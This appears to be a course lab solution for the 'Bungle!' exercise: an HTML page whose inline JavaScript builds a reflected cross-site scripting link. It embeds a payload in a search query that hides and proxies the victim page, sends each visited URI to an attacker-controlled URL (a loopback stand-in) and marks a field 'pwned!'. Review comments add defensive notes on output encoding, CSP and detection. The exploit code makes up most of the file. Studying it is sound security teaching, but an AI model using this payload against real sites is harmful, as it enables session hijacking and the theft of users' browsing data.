<!-- Page head: declares the encoding and pulls in jQuery, which the inline script below relies on ($). -->
<meta charset="utf-8">
<!-- NOTE(review): jQuery is fetched over plain http with no integrity attribute, so anyone on the network path can alter the script this page executes; prefer the https URL together with an SRI hash. -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
// Extend this function:
/**
 * Script body that makeLink() serializes with payload.toString() and embeds in
 * the q parameter of the search URL, so it is meant to run in the linked page
 * rather than in this file.
 *
 * As written it hides the <html> element, loads "./" into it with jQuery
 * .load(), shows it again, sends {event: "nav", uri: href} to `attacker` with
 * $.get() (the same data is echoed to console.log), and sets #query to "pwned!".
 *
 * NOTE(review): comments are kept outside the function body on purpose. The
 * function's source text is what gets embedded in the link, so any edit inside
 * the body changes the generated URL.
 * NOTE(review): the code uses $ without loading it, so it presumably relies on
 * the page it runs in already providing jQuery; confirm against the target.
 * NOTE(review): for detection, the observable signals in this code are a GET
 * to the `attacker` URL carrying event/uri parameters, and a search request
 * whose q parameter contains a script element.
 *
 * @param {string} attacker - URL that receives the logged events as GET query parameters.
 */
function payload(attacker) {
function log(data) {
console.log($.param(data))
$.get(attacker, data);
}
function proxy(href) {
$("html").load(href, function(){
$("html").show();
log({event: "nav", uri: href});
$("#query").val("pwned!");
});
}
$("html").hide();
proxy("./");
}
/**
 * Builds the search URL used by the "Try Bungle!" link.
 *
 * For defense level 0 the q parameter holds a script element whose text is the
 * source of payload() (taken with payload.toString()) followed by a call to it
 * with `attacker`. Every other level is an unfilled course placeholder and
 * yields undefined.
 *
 * NOTE(review): presumably the target's search page echoes q back unescaped;
 * contextual output encoding of q, plus a CSP that disallows inline script, is
 * what would render a link like this inert.
 *
 * @param {number} xssdefense - Defense level; compared loosely against 0.
 * @param {string} target - Base URL of the site, ending in "/".
 * @param {string} attacker - URL handed to payload() inside the embedded script.
 * @returns {string|undefined} The link, or undefined when xssdefense is not 0.
 */
function makeLink(xssdefense, target, attacker) {
  // Loose inequality mirrors the original `== 0` test, so "0" and "" still count as level 0.
  if (xssdefense != 0) {
    // Placeholder branch from the assignment: nothing is built for other levels.
    return undefined;
  }

  // The closing tag is assembled from two pieces because this code sits inside
  // an inline script element and must not contain the literal end tag.
  var injected = "<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">";
  var prefix = target + "./search?xssdefense=" + xssdefense.toString() + "&q=";
  return prefix + encodeURIComponent(injected);
}
// Lab configuration passed to makeLink() when the page is ready.
var xssdefense = 0, // defense level; makeLink() only builds a link for 0
    target = "http://permalink.co/", // base URL the search path is appended to
    attacker = "http://127.0.0.1:31337/stolen"; // loopback URL that payload() reports to
// Once the DOM is ready, render the "Try Bungle!" anchor inside the <h3>.
// The href comes from makeLink(); the link opens in the window named "run".
$(document).ready(function () {
  var link = makeLink(xssdefense, target, attacker);
  // NOTE(review): the markup is built by string concatenation; that holds only
  // while `link` contains no double quote, which is true for the constants above.
  var markup = "<a target=\"run\" href=\"" + link + "\">Try Bungle!</a>";
  $("h3").html(markup);
});
</script>
<h3></h3>